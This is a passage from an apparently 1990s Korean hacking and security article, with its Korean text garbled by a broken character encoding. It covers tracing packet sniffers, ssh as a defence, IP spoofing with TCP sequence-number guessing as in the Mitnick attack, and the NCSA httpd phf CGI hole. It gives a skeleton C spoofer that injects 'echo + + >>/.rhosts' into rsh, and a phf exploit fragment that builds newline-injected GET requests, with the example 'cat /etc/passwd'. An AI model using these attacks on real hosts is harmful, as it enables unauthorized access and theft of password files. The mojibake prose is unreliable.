    µ¥ÀÌÅ͸¦ ¸ðÀº´Ù. µû¶ó¼­ ±× ·Î±× ÆÄÀÏÀ» ãÀ» ¼ö ÀÖÀ¸¸é ½º´ÏÆÛ¸¦ ã±â°¡ ½¬¾îÁø´Ù. ¿ì¼± ´ÙÀ½°ú °°Àº °£´ÜÇÑ ¹æ¹ýÀÌ ÀÖ´Ù.
    
    ´Ù¸¥ È£½ºÆ®·Î ¿¬°áÀ» ÇÏ¸é ½º´ÏÆÛ ·Î±× ÆÄÀÏ¿¡ ·Î±×°¡ »õ·Î ¸¸µé¾îÁö°Ô µÇ¹Ç·Î¹Ì¸® ¸¸µé¾î µÎ¾ú´ø /tmp/sniff_trapÀ̶õ ÆÄÀÏÀ»
    ±âÁØÀ¸·Î ÇØ Ã£À» ¼ö°¡ ÀÖ´Ù. ´Ü ºü¸¥ °á°ú¸¦ À§ÇØ ·çÆ®¿¡¼­ ÇÁ·Î¼¼½ºÀÇ ¿ì¼±±ÇÀ» ÃÖ´ë·Î ÇÑ´Ù. º¸´Ù È®½ÇÈ÷ Çϱâ À§Çؼ­ ÇöÀç ¿­·ÁÁ® ÀÖ´Â
    ¸ðµç ÆÄÀÏÀÇ ¸®½ºÆ®¸¦ ¾Ë ¼ö ÀÖ´Ù¸é ±× ¼Ó¿¡ ½º´ÏÆÛ ·Î±× ÆÄÀϵµ Æ÷ÇԵŠÀÖÀ» °ÍÀ̹ǷΠ½º´ÏÆÛ¸¦ ã´Âµ¥ µµ¿òÀÌ µÈ´Ù.
    lsof(ftp://ftp.cert-kr.or.kr/pub/tools/lsof) ÀÌ

¶ó´Â ÅøÀÇ »ç¿ëÀ» ±ÇÇÑ´Ù.
    
    ½º´ÏÆÛ ·Î±× ÆÄÀÏÀ» ã¾Æ ¾ø¾Ý´Ù¸é ½º´ÏÆÛ ÇÁ·Î¼¼½º¸¦ ãµµ·Ï ³ë·ÂÇغ»´Ù. ½Ã½ºÅÛÀ» ¸®ºÎÆÃÇÏ¸é µÇ°ÚÁö¸¸ ±×º¸´Ù ħÀÔÀÚ¸¦ ÃßÀû ÇÏ°í ½Í´Ù¸é ±×
    ÇÁ·Î¼¼½º¸¦ Á÷Á¢ ã¾Æ³»´Â °ÍÀÌ ¹Ù¶÷Á÷ÇÏ´Ù. ·çÆ®·Î ½ÇÇàµÇ°í ÀÖ´Â ÇÁ·Î¼¼½ºÁß¿¡¼­ ¼ö»óÇÑ °ÍµéÀ» ã´Â´Ù. ./a.out,
    ./in.telnetd, in.uucpd µîÀ¸·Î ¼û°ÜÁö´Â°Ô º¸ÅëÀε¥ ¾Ë¾Æ³»±â ¾î·ÆÀÝ´Ù.
    
    
        # touch /tmp/sniff_trap
        # telnet gondor.kaist.ac.kr
        
        SunOS UNIX (gondor)
        
        login: blah
        Password:
        Login incorrect
        login:^D
        Connection closed by foreign host.
        # nice -19 find / -newer /tmp/sniff_trap -print
        
        
    BSD ps(/usr/ucb/ps)°¡ »ç¿ë °¡´ÉÇÏ´Ù¸é e¿É¼ÇÀ» Ãß°¡Çؼ­ ÇÁ·Î¼¼½º°¡ ½ÃÀÛµÆÀ» ¶§ÀÇ È¯°æº¯¼ö¸¦ ¾Ë¾Æ³»¾î ¾î¶² °èÁ¤ÀÌ ÇØÅ·¿¡
    »ç¿ëµÆ´ÂÁö¸¦ ¾Ë¾Æ³¾ ¼ö ÀÖ´Ù.
    
    
    ¾î¶»°Ô ¿¹¹æÇØ¾ß Çϳª?
   

 
    ½º´ÏÆÛ¿¡ ´ëºñÇÏ´Â ¹æ¹ýÀÇ ¿øÄ¢Àº Æнº¿öµå°¡ ³×Æ®¿öÅ©¸¦ ÅëÇØ Àü´ÞµÇÁö ¾Ê°Ô ÇÏ´Â °ÍÀÌ´Ù. ±×°ÍÀÇ ±¸ÇöÀº ¾Ïȣȭ¸¦ ÀÌ¿ëÇϰųª (secure
    shell, kerberos) Æнº¿öµå¸¦ ´ë½ÅÇÏ´Â ÅäÅ«À» ÀÌ¿ë(S/key)ÇÏ´Â °ÍÀ» ¿¹·Î µé ¼ö ÀÖ´Ù. ±×·± ºÎ·ùÀÇ ¼ÒÇÁÆ®¿þ¾îµéÀº »ó
    ´ç¼ö°¡ Á¦ÀÛµÅÀִµ¥ ±×Áß °ø°³ ¼ÒÇÁÆ®¿þ¾îÀÎ ssh(Secure Shell: http://www.cs.hut.fi/ssh)ÀÌ »ç¿ëÇϱ⿡
    °¡Àå ¹«³­ÇÏ´Ù . ÀÌ°ÍÀº ÆÐŶÀ» ¾ÏȣȭÇØ sshd(¼­¹ö)¿¡°Ô º¸³»´Â ssh,scp(Ŭ¶óÀ̾ðÆ®)°¡ telnet, rlogin, ftp¸¦
    ´ë½ÅÇÏ´Â ÆÐÅ°ÁöÀÌ´Ù.
    
    ÀÌÁ¦ Á»´õ °í¼öÁØÀÇ ÇØÅ· ¹æ¹ýÁßÀÇ ÇϳªÀÎ spoofing¿¡ ´ëÇؼ­ ¾Ë¾Æº¸µµ·Ï ÇÏÀÚ.
    
    
    IP ½ºÇªÇÎÀ̶õ?
    
    spoof¶õ ´Ü¾î´Â '¼ÓÀÌ´Ù, »ç±âÄ¡´Ù'´Â ¶æÀÌ´Ù. Áï ½±°Ô ¼³¸íÇϸé ÇØÄ¿°¡ ¸Ó¹°·¯ÀÖ´Â, ¶Ç´Â ´Ü¼øÈ÷ ¾Ç¿ëÇÏ°íÀÚ Çϴ ȣ½ºÆ®ÀÇ IP
    ¾îµå·¹½º¸¦ ¹Ù²Ù¾î¼­ À̸¦ ÅëÇØ ÇØÅ·À» ÇÏ´Â °ÍÀÌ´Ù. °¡·É A¶õ È£½ºÆ®¿Í B¶õ È£½ºÆ®°¡ Çϵåµð½ºÅ©¸¦ °øÀ¯ÇÏ°í Àִµ¥ A ¶õ È£½º Æ®¿Í B¶õ
    È£½ºÆ®´Â º¸¾ÈÀÌ Àß µÇ¾î¼­ ÇØÅ·ÇϱⰡ º¸Åë ¾î·Á¿î °ÍÀÌ ¾Æ´Ï¶ó°í ÇÏÀÚ.
    
    ÇÏÁö¸¸ ¾î¶»°Ô¼­µçÁö B¶õ È£½ºÆ®¾È¿¡ ÀÖ´Â ÀÏ±Þ ±Øºñ ¹®¼­¸¦ ÈÉÃÄ¿À°í ½Í´Ù¸é ¾î¶»°Ô ÇØ¾ß ÇÒ±î? ±×·¸´Ù¸é ÇØÄ¿ÀÇ ÃÖ¼±ÀÇ ¼± Åà ¹æ¹ýÀº
    ´ÙÀ½°ú °°´Ù. ¿ì¼± ÀÚ½ÅÀÌ ¸Ó¹°·¯ Àִ ȣ½ºÆ®ÀÇ IP ¾îµå·¹½º¸¦ BÀÇ ¾îµå·¹½º·Î À§ÀåÀ» ÇÑ´Ù. À§ÀåÀ» Çϸé B ÀÇ È£

½º Æ®ÀÇ È­¸é¿¡´Â
    duplicated IP address ¶ó´Â ¹®ÀåÀÌ ÂïÈ÷°Ô µÇ°í BÈ£½ºÆ®´Â ³×Æ®¿öÅ© ±â´ÉÀ» Àá½Ã »ó½ÇÇÏ°Ô µÈ´Ù.
    
    À̶§¸¦ ³õÄ¡Áö ¾Ê°í ÇØÄ¿ÀÇ È£½ºÆ®´Â A È£½ºÆ®¿¡°Ô ÀÚ½ÅÀÌ ÁøÂ¥ BÈ£½ºÆ®¶ó´Â Á¤º¸¸¦ º¸³»¾î AÈ£½ºÆ®¿Í °°ÀÌ ÇÏµå µð½ºÅ©¸¦ °øÀ¯ Çϵµ·Ï
    ½ÃµµÇÑ´Ù. ¼º°øÇÏ°Ô µÇ¸é ÇØÄ¿´Â AÈ£½ºÆ®ÀÇ Çϵåµð½ºÅ©¿¡ ÀÖ´Â ±Øºñ ¹®¼­¸¦ AÈ£½ºÆ®³ª BÈ£½ºÆ®¿¡ ÀâÀÔÇÏÁö ¾Ê°íµµ ¾ò¾î³¾ ¼ö ÀÖ°Ô µÈ´Ù.
    
    ¶ÇÇÑ IP ½ºÇªÇΰú Ç×»ó ¿¬µ¿µÅ »ç¿ëµÇ´Â °ø°Ý¹ýÀ¸·Î TCP sequence number guessing attackÀ» µé ¼ö ÀÖ´Ù. ÀÌ¿¡
    ´ëÇؼ­µµ Àá½Ã ¼³¸íÇغ¼±î ÇÑ´Ù.
    
    
    TCP Sequence Number Guessing AttackÀ̶õ?
    
    °ú°Å¿¡ Internet wormÀÇ ÀúÀڷεµ À¯¸íÇß´ø Robert T.Morris°¡ º§ ¿¬±¸¼Ò¿¡¼­ ÀÎÅϽ±À¸·Î ÀÏÇÒ ¶§ ½è´ø ³í¹®¿¡¼­
    Ã³À½À¸·Î ¾Ë·Á Á³°í AT&T»çÀÇ Bellovin S.MÀÌ 89³â¿¡ ¾´ ³í¹®¿¡¼­µµ ¾ð±ÞÀÌ µÇ¾ú´ø °ø°Ý ¹æ¹ýÀÌ´Ù(Security
    Problems in the TCP/IP Protoc ol Suite).
    
    
    Äɺó ¹ÌÆ®´ÐÀÌ »ç¿ëÇÑ ¹æ¹ý
    
    ¶ÇÇÑ, ÀÌ·± °ø°ÝÀ» ÀÌ¿ëÇØ À۳⵵¿¡ ½ÃÅ¥¸®Æ¼°è¸¦ ¶°µé¼®ÇÏ°Ô Çß¾ú´ø »ç°ÇÀÌ Çϳª ÀÖ´Ù. ¹Ù·Î Äɺó ¹ÌÆ®´ÐÀÌ ½Ã¸ð¹«¶ó ¾²Å乫( ½´ÆÛÄÄÇ»ÅÍ
    ¼¾ÅÍ ¼Ò¼Ó ¿¬±¸¿ø)ÀÇ ÄÄÇ»Å͸¦

°ø°ÝÇØ ÀڷḦ »©°£ µÚ °ü¸®ÀÚÀÎ ½Ã¸ð¹«¶ó ¾²Å乫¸¦ Á¶·ÕÇÏ°í ´Þ¾Æ³­ »ç°ÇÀÌ´Ù. Äɺó ¹ÌÆ®´ÐÀº »ó´ç±â°£ µ¿¾È
    ÀâÈ÷Áö ¾Ê´Ù°¡ ½Ã¸ð¹«¶ó ¾²ÅäÄíÀÇ ´«¹°°Ü¿î ÃßÀû³¡¿¡ °£½ÅÈ÷ ÀâÈù °ÍÀ¸·Î ÀÌ »ç°ÇÀº °á¸»³ª°Ô µÇ¾ú´Ù. Äɺó ¹ÌÆ®´ÐÀÌ Ã¼Æ÷µÇ¾î ÀâÇô°¡¸é¼­
    ½Ã¸ð¹«¶ó¿¡°Ô "´ç½ÅÀÇ ½Ç·ÂÀº Á¤¸» ³î¶ó¿Ô¼Ò." ¶ó°í ¸»ÇØ ´õ À¯¸íÇØÁø »ç°ÇÀ̱⵵ ÇÏ´Ù. ¹Ù·Î ÀÌ »ç°Ç¿¡¼­ Äɺó ¹ÌÆ®´ÐÀÌ ¾´ ¹æ¹ýµµ TCP
    Sequence Number guessing attackÀÇ Æ¯º°ÇÑ ÇÑ ÇüŶó°í ÇÒ ¼ö ÀÖ´Ù . (¹ÌÆ®´ÐÀÌ »ç¿ëÇÑ ¹æ¹ýÀº IP ¾îµå·¹½º¸¦
    spoofÇؼ­ Berkerly R-command(rlogin, rcp , rsh µîµî)¸¦ °ø°ÝÇÑ ¹æ¹ýÀ̾ú´Ù.)
    
    ÀÚ ÀÌÁ¦, IP Spoofing°ú TCP Sequence number guessing attackÀ» ÀÚ¼¼È÷ ¾Ë¾Æº¸ÀÚ. °£´ÜÈ÷ A¿Í B¶ó´Â
    È£½ºÆ®°¡ ¼­·Î¸¦ trustÇÏ °í ÀÖ´Ù°í °¡Á¤ÇÏÀÚ. ÀÚ½ÅÀÇ PCÀÇ IP ¾îµå·¹½º¸¦ B¶ó´Â È£½ºÆ®·Î ¹Ù²Ù°í A¿¡°Ô Á¢±ÙÇÏ¸é °¡´É¼ºÀÌ ÀÖÁö
    ¾Ê°Ú´À³Ä¶ó°í Àǹ®À» Á¦ ±âÇÏ´Â ºÐÀÌ °è½ÇÁöµµ ¸ð¸£°ÚÀ¸³ª ÀÚ½ÅÀÇ À§Ä¡°¡ B¶ó´Â È£½ºÆ®°¡ À§Ä¡ÇÑ °÷º¸´Ù Aº¸´Ù ÈξÀ ´õ ½Ã°£ÀûÀ¸·Î À¯¸®ÇÑ
    À§Ä¡, Áï LAN ¿¡¼­³ª °¡´ÉÇÒ ¹ýÇÑ À̾߱â´Ù. ±×¿ÜÀÇ °æ¿ì¿¡´Â °ÅÀÇ ¼Ò¿ëÀÌ ¾ø´Ù°í º¸¾Æµµ ¹«¹æÇÏ´Ù..
    
    ÀÚ½ÅÀÇ IP ¾îµå·¹½º¸¦ º¯Á¶Çصµ B¶ó´Â trusted host°¡ A¿¡°Ô·Î µµ´ÞÇÏ´Â °Å¸®°¡ ¸Ö»Ó¸¸ ¾Æ´Ï¶ó. ÀÚ½ÅÀÇ ¼­ºê³Ý¿¡¼­ ´Ù¸¥ IP ¾î
    µå·¹½º¸¦ °¡Áø ÆÐŶÀ» ³¯¸°´Ù´Â °ÍÀº ¶ó¿ìÆûóÀÇ ¹®Á¦¸¦ ºñ·ÔÇØ °®°¡Áö ¹®Á¦Á¡ÀÌ Á¦±âµÈ´Ù.
    

    ±×·³ Äɺó ¹ÌÆ®´ÐÀÌ Berkeley R-commands¸¦ °ø°ÝÇÏ´Â °æ¿ì¸¦ ¿¹·Î µé¾î¼­ IP spoofing ÀÌ ¾î¶»°Ô ÀÛ¿ëÇϳª¿¡ ´ëÇؼ­
    ¾Ë¾Æº¸±â ·Î ÇÏÀÚ. ¿¹¸¦ µé¾î ÇØÄ¿ÀÇ È£½ºÆ®¸¦ evil.comÀ̶ó ÇÏ°í target.comÀ» °ø°ÝÇϱâ À§Çؼ­ target.com°ú
    good.com°£ÀÇ trusting Re lationshipÀ» ÀÌ¿ëÇÏ°íÀÚ ÇÑ´Ù. Áï ,
    
    
        target.com # cat /.rhosts
        good.com root
        target.com #
        
    °£´ÜÈ÷ evil.comÀÇ IP ¾îµå·¹½º¸¦ good.comÀÇ IP ¾îµå·¹½º·Î ¹Ù²Û ´ÙÀ½¿¡target.comÀÇ rsh server¿¡
    Á¢¼ÓÇÏ·Á°í ½ÃµµÇß´Ù ÇÏÀÚ. ÀÌ °æ¿ì¿¡´Â TCP°¡ °®°í ÀÖ´Â Initial 3-way ÇÚµå¼ÎÀÌÅ· ¶§¹®¿¡ Ä¿³Ø¼ÇÀÌ ÀÌ·ïÁöÁö ¾Ê´Â´Ù. TCPÀÇ
    Initial 3-way ÇÚµå¼ÎÀÌÅ· ÀÇ ¿¹¸¦ ¿ì¼± µé¾îº¸ÀÚ.
    
    evil.com# telnet target.com login ÇÒ °æ¿ì
    
    
        evil.com -> target.com SYN 1415531521
        
            // evil.comÀÌ Initial sequence number ¸¦ º¸³½´Ù.
            
        target.com -> evil.com ACK 1415531521 SYN 1823083

521
        
            // target.comÀÌ evil.comÀÌ º¸³½ ISNÀ» ACKÇÏ°í target.comÀÌ ÀÚ½ÅÀÇ
            // Initial sequence number ¸¦ º¸³½´Ù.
            
        evil.com -> target.com ACK 1823083521
        
            // evil.comÀÌ target.comÀÇ ISNÀ» ACKÇÑ´Ù.
            
    À§¿Í °°Àº ÆÐŶÀÌ ±³È¯µÈ´Ù. TCP Çì´õÀÇ SYN Ç÷¡±×´Â 'synchronize sequence numbers'ÀÌ´Ù. SYN Ç÷¡±×´Â
    TCP Sequence Number ¸¦ µ¿¹ÝÇϴµ¥ ÀÌ ³Ñ¹ö´Â TCP/IP implementation¸¶´Ù »ý¼ºµÇ´Â ¹æ¹ýÀÌ ¾à°£¾¿ ´Ù¸£´Ù.
    4.4BSD¿¡¼­´Â OS°¡ ÃʱâÈ­µÉ ¶§ 1·Î Ãʱâ È­µÇ°í ±× ÈÄ´Â 0.5Ãʸ¶´Ù 64,000¾¿ Áõ°¡ÇÑ´Ù. ¶ÇÇÑ »õ·Î¿î TCP Ä¿³Ø¼ÇÀÌ
    ¸¸µé¾îÁú ¶§¸¶´Ù 64,000¾¿ Áõ°¡ÇÑ´Ù.
    
    ´Ü¼øÈ÷ evil.comÀÇ IP ¾îµå·¹½º¸¦ ¹Ù²Ù´Â °Í¸¸À¸·Î´Â target.comÀÌ evil.comÇÑÅ× º¸³»´Â ISNÀ» ¹ÞÀ» ¼ö°¡
    ¾ø°í(¿Ö³Ä¸é target.c omÀº good.com¿¡°Ô ISNÀ» º¸³»°ÚÁö¿ä.¶ó¿ìÆÃÀÌ ±×·¸°Ô µÇ¾î ÀÖÀ» Å״ϱî.) µû¶ó¼­ Ä¿³Ø¼ÇÀÌ ¼º¸³µÇÁö
    ¾Ê´Â´Ù. Ä¿³Ø¼ÇÀÌ establis hµÉ·Á¸é good.comÀÌ target.comÀÌ º¸³»´Â ISNÀÌ º¸³»´Â ÆÐŶ¿¡ ÀÀ´äÀ» ÇÏÁö ¸»¾Æ¾ßÇÒ
    »Ó¸¸ ¾Æ´Ï¶ó(º¸ÅëÀÇ

°æ¿ì good.comÀº ÀÌ ·² °æ¿ì RST(Reset connection) ÆÐŶÀ» º¸³»¼­ ¸ðµç °ÍÀ» ¸ÁÄ£´Ù)
    target.comÀÌ good.com¿¡°Ô º¸³½ ISNÀ» ÃßÃøÇؼ­ ACKÇØÁà¾ß ÇÑ´Ù. ÀÌ µÎ ½ºÅÜÀÌ ¿Ïº®ÇÏ°Ô µÆÀ» °æ¿ì echo '+ +'
    > /.rhosts À» ´ãÀº rsh ÆÐŶÀ» º¸³» ¿øÇÏ´Â ¸ñÀûÀ» ÀÌ·ê ¼ö°¡ ÀÖ´Ù.
    
    
    IP spooferÀÇ ´ë·«ÀûÀÎ ÄÚµå
    
    
        hose_conn(trust_host, trust_addr, seq_num, port_num)
        {
        
            ...
            /* sendtcppacket(
            struct ether_addr source_hardware addr.
            struct ehter_addr dest_hardware addr.
            u_long source ip addr.
            u_long dest ip addr.
            u_short source port.
            u_short dest port.
            u_long sequence no.
            u_long acknowledge no.
            int flags (SYN, RST, ACK, PUSH, FIN)
     

       char * data
            int strlen(data)
            */
            sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), bad_addr,
            trust_addr, port_num[i], 513, seq_num, 0, TM_SYN, NULL, 0);
            ...
            
        }
        
        det_seq(targ_host, targ_addr, next_seq, offset)
        {
        
            ...
            
                / Ä¿³Ø¼ÇÀ» ¿ä±¸ÇÏ´Â ÆÐŶÀÇ Àü¼Û /
                
            sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), my_addr,
            targ_addr, start_port, 514, start_seq, 0, TM_SYN, NULL, 0);
            /* readpacket(
            struct fddi_header fddi_header
            struct ether_header ether_header
            struct ip ip_header
         

   struct udphdr udp_header
            struct tcphdr tcp_header
            char * data
            int strlen(data) )
            */
            while(readpacket(NULL, &eh2, &iph, NULL, &tcph, NULL, NULL) !=
            PTYPE_IP_TCP) ;
            
                if(ntohs(tcph.th_dport)==start_port &&
                ntohs(tcph.th_sport)==514) {
                
                
                    / Æ÷Æ®¹øÈ£°¡ ¸Â´Ù¸é reply ÆÐŶÀ¸·Î °£ÁÖÇÏ°í guessingÀ» ½ÃÀÛÇÑ´Ù /
                    
                if(prev_seq) diff=tcph.th_seq-prev_seq;
                else diff=0;
                if(*offset==0) *offset=diff;
                prev_seq=tcph.th_seq;
                sendtcppacket(&(eh.ether_shost), &(eh_ether_dhost), my_addr,
                targ_addr, start_port+

+, 514, start_seq++, 0, TM_RST, NULL, 0);
                
            ...
            
        }
        
        
        spoof_conn(trust_addr, targ_host, targ_addr, next_seq)
        {
        
            char *string="0\0root\0root\0echo + + >>/.rhosts\0";
            
            
                / SYN ÆÐŶÀ» °íÀ¯ÇÑ ½ÃÄö½º¹øÈ£¿¡ ¸ÂÃç Àü¼Û /
                
            sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr,
            targ_addr, port, 514, seq++, 0, TM_SYN, NULL, 0);
            usleep(5000);
            
                / guessÇÑ ½ÃÄö½º¹øÈ£¿¡ ¸ÂÃç ACK ÆÐŶÀ» Àü¼Û /
                
            sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr,
            targ_addr, port, 514, seq, ++next_s

eq, TM_ACK, NULL, 0);
            
                / rsh request¸¦ ½ÃÄö½º¹øÈ£¿Í ACK¹øÈ£¿¡ ¸ÂÃß¾î Àü¼Û /
                
            sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr,
            targ_addr, port, 514, seq, next_seq, TM_ACK, string, stringlen);
            seq+=stringlen;
            
                / Àü¼ÛÇÑ ÆÐŶÀÌ ACKµÇ¾î 󸮵DZ⸦ ±â´Ù¸°´Ù /
                
            sleep(1);
            
                / »õ·Î¿î ½ÃÄö½º¹øÈ£¿¡ ¸ÂÃß¾î FINÆÐŶÀ» Àü¼Û /
                
            sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr,
            targ_addr, port, 514, seq, next_seq, TM_FIN, NULL, 0);
            
                / RSTÆÐŶ Àü¼Û, Ä¿³Ø¼Ç Æıâ./
                
            sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr,

            targ_addr, port, 514, seq+4, next_seq+4, TM_RST, NULL, 0);
            ...
            
        }
        
        main(argc, argv)
        {
        
                /* initialization of the packet */
                
            init_filter("tcp", NULL);
            
                /* trusted hostÀÇ 513¹ø Æ÷Æ®¿¡ ´ëÇØ flooding ½ÃÀÛ */
                
            hose_trusted(argv[1], trust_addr, seq_num, port_num);
            
                /* guessing Sequence Number */
                
            det_seq(argv[2], targ_addr, &next_seq, &offset);
            
                /* ½ÇÁ¦ spoofingÇÑ Ä¿³Ø¼ÇÀ» ½ÃÀÛ. À̶§¿¡´Â ´ÙÀ½ ½ÃÄö½º¹øÈ£¸¦ ¾Ë°íÀÖ´Ù */
                
            spoof_conn(trust_addr, argv[2], targ_addr, next_s

eq);
            
                /* ¸ðµç Ä¿³Ø¼ÇÀ» reset. */
                
            reset_trusted(argv[1], trust_addr, seq_num, port_num);
            exit(0);
            
        }
        
    * IP spoofing ¿¡ ´ëÇؼ­´Â ´ÙÀ½ÀÇ Á¤º¸¸¦ ÂüÁ¶ÇÏÀÚ.
    
    
        ftp://ftp.research.att.com/dist/internet_security
        
            Bellovin paper : ipext.ps.Z
            
                -> "Security Problems in the TCP/IP Protocol Suite"
                
            Morris paper : 117.ps.Z
            
                -> "A Weakness in the 4.2BSD Unix TCP/IP Software"
                
        CERT_advisory
        
            CA-95:01.IP.spoofing
            
    ³Ý½ºÄÉÀÌ

ÇÁ¸¦ ÀÌ¿ëÇÑ ÇØÅ·
    
    ¸¶Áö¸·À¸·Î ÃÖ±Ù ¸¹Àº Àα⸦ ¾ò°í ÀÖ´Â ³Ý½ºÄÉÀÌÇÁ¸¦ ÀÌ¿ëÇØ ÇØÅ·ÇÏ´Â ±â¹ý¿¡ ´ëÇØ »ìÆ캸ÀÚ.
    
    NCSA HTTPD¸¦ ÀÌ¿ëÇÑ ÇØÅ·
    
    ÂüÁ¶: CERT Advisory CA-95:04
    CIAC Advisory F-11: UNIX NCSA httpd Vulnerability
    
    NCSA HTTPD¸¦ µ¹¸®´Â È£½ºÆ®ÀÇ °ü¸®ÀÚµéÀº ¼Ò½º¿¡ CERT Advisory CA-95:04¿¡¼­ Á¦½ÃÇÑ ÆÐÄ¡¸¦ Àû¿ëÇÑ ÈÄ µ¹·ÁÁÖ±â
    ¹Ù¶õ´Ù. httpd ÇÁ·Î¼¼½º°¡ ÀÛµ¿ÇÏ´Â µ¿¾È ¿ÜºÎÀÇ ÇØÄ¿°¡ ¾Æ¹«·± ÀÎÁõÀýÂ÷¾øÀÌ NCSA httpd°¡ ÀÓÀÇÀÇ ¸í·É¾î¸¦ ¼öÇàÇϵµ·Ï ÇÒ ¼ö
    ÀÖ´Ù. ºñ·Ï machine instruction levelÀ̾ °ø°Ý´çÇϱ⠱׸® ½¬¿î ¹ö±×´Â ¾Æ´ÏÁö¸¸ ÁÖÀÇ°¡ ¿ä±¸µÇ´Â ¹ÙÀÌ´Ù. ÇöÀç
    NCSA¿¡¼­´Â ÀÌ È¦À» ÆÐÄ¡ÇÑ ¼Ò½º¿Í ¹ÙÀ̳ʸ® ¹öÀü 1.3RÀ» ³»³õ°í ÀÖ´Ù.
    
    ¶ÇÇÑ NCSAÀÇ cgi-binÀÇ ¿¹Á¦·Î µû¶ó¿À´Â ÇÁ·Î±×·¥Áß phf¶ó´Â ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù.ÀÌ ÇÁ·Î±×·¥ÀÇ ¹®Á¦´Â popen(3S)ÀÌ »õ·Î¿î
    ¶óÀÎÀÌ µé¾î¿Ã °æ¿ì »õ·Î¿î command ·Î ÀνÄÇϱ⠶§¹®¿¡ ¹®Á¦°¡ ¹ß»ýÇÑ´Ù.
    
    cgi-bin ÇÁ·Î±×·¥ÀÌ popenÀ» »ç¿ëÇÒ °æ¿ì ´ÙÀ½°ú °°Àº ·ùÀÇ ÇÁ·Î±×·¥À» ÀÌ¿ëÇØ ½±°Ô exploitµÉ ¼ö ÀÖ´Ù. ¾Æ·¡ÀÇ ÄÚµå´Â
    ±âº»Àû À¸·Î NCSA¿¡ µþ·Á¿À´Â /cgi-bin/phf ¸¦ ÀÌ¿ëÇÏ°í ÀÖ´Ù. ¾ð·ÐÀÇ ¼º°Ý»ó ÀüºÎ¸¦ ½ÆÁö´Â ¾Ê°í ÁÖ¿äÇÑ ºÎºÐ

¸¸À» ½Æ´Â °ÍÀ»
    ¾çÇØÇØ Áֱ⠹ٶõ´Ù.
    
    
        /*
        Usage : get hostname 'command you wanna execute'
        EX : get targethost 'cat /etc/passwd'
        */
        /* ÁÖ¿ä ÇÔ¼ö ¸î°¡Áö¸¸À» Àû¾ú´Ù. */
        
        int writen( fd , buf, nbytes )
        register int fd ;
        register char *buf ;
        register int nbytes ;
        {
        
            int nleft , nwritten ;
            
            nleft = nbytes ;
            while( nleft > 0 ) {
            
                nwritten = write( fd , buf , nleft );
                if( nwritten <= 0 ) return(nwritten);
                nleft -= nwritten ;
                buf += nwritten ;
                
  

          }
            return( nbytes - nleft );
            
        }
        
        void make_cmd( char *cmd ,char *cmdinput)
        {
        
            char *tok;
            char buf[100];
            char *before = "GET /cgi-bin/phf?Jserver=life.sucks&Qalias=";
            char *behind =
            "&Qname=&Qemail=&nickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip=\
            n";
            bzero(buf,sizeof(buf));
            strcat(buf,"%0A");
            tok = strtok(cmdinput," ");
            strcat(buf,tok); strcat(buf,"%20");
            while( (tok=strtok(NULL," ")) != NULL ){
            
                strcat(buf,tok);
                strcat(buf,"%20");
            

    
            }
            strcat(cmd,before);
            strcat(cmd,buf);
            strcat(cmd,behind);
            
        }
        
    ÇØÅ·°èÀÇ Çö½Ç
    
    ÇØÅ·Àº ¾È ÁÁÀº ÀνÄÀ̶ó´Â °ÍÀÌ ´ëºÎºÐÀÇ Áß·ÐÀÌ´Ù. ÇÏÁö¸¸ ½Ã½ºÅÛ °ü¸®ÀÚµéÀÇ ´ëºÎºÐÀÇ °æÇèÀ» µé¾îº¸°Å³ª, ±×µéÀÇ ÀÇ°ßÀ» µé ¾îº¸¸é ÇØÅ·Àº
    ÇÊ¿ä¾ÇÀ̶ó´Â ÀνÄÀ» ¸¹ÀÌ ÇÏ°í ÀÖ´Ù. ¸ÖƼÀ¯ÀúµéÀ» À§ÇÑ ½Ã½ºÅÛÀ̾ º¸¾È»ó ¿Ïº®ÇÒ ¼ö ¾ø´Ù´Â °ÍÀÌ ¼öÇÐÀûÀ¸·Î Áõ¸íµÈ »óÅÂÀ̹ǷÎ, º¸¾È¿¡
    ¿Ïº®Àº ±âÇÏÁö ¸øÇÏ´õ¶óµµ ÃÖ¼±À» ±âÇϱâ À§Çؼ­´Â ¾î´À Á¤µµ ÇØÅ·¿¡ ´ëÇÑ Áö½ÄÀÌ ÀÖ¾î¾ß ÇÑ´Ù.
    
    ¶ÇÇÑ ½Ã½ºÅÛÀÇ ¹ö±×¸¦ ¹ß°ßÇؼ­ ¹ö±× ¸®Æ÷Æ®¸¦ ¹ßÇ¥ÇÑ ´ë´Ù¼öµéÀº ¸ðµÎ ÇÑ ¶§ ½Ã½ºÅÛ Ä§ÀÔÀڷμ­ÀÇ °æ·ÂÀ» °¡Á³´ø »ç¶÷µéÀÌ ´ë ºÎºÐÀ̶ó´Â °ÍÀÌ
    À̸¦ ¹ÝÁõÇØÁشٰí ÇÒ ¼ö ÀÖ°Ú´Ù. ÇöÀç Å×Å©´ÐÀÌ ¶Ù¾î³­ ÇØÄ¿µéÀº ´ëÇлýµéÀÌ ´ëºÎºÐÀε¥, À̵éÀº ÀڽŵéÀÇ º¸ ¾È¿¡ ´ëÇÑ Áö½ÄÀ»
    ÀÎÁ¤ÇØÁÖ¾úÀ¸¸é ÇÏ´Â ¹Ù·¥À» °®°í ÀÖ´Ù.
    
    ÇØÄ¿ ÃßÀûÇϱâ(Intrusion detection)
    ¾ðÁ¦±îÁö ÇØÄ¿¿¡°Ô ´çÇÏ°í¸¸ ÀÖÀ»°ÍÀΰ¡? ÇØÄ¿°¡ µé¾î¿Ô´Ù¸é ÃßÀûÀ» Çؼ­ Àâ¾Æ³»´Â ÀÏ ¶ÇÇÑ Áß¿äÇÏ´Ù°í ÇÒ ¼ö ÀÖ´Ù. ÀÌÁ¦ ÇØÄ¿¸¦ ÃßÀûÇÏ´Â
    ¹æ¹ý¿¡ ´ëÇØ ¾Ë¾Æº¸±â·Î ÇÏÀÚ. óÀ½ ½Ã½ºÅÛ¿¡ ·Î±×ÀÎÇÏ°Ô µÇ¸é ´ÙÀ½°ú °°Àº ¸Þ½ÃÁö¸¦ º¸³¾ °ÍÀÌ´Ù.


    
    
        login: sakai
        password:
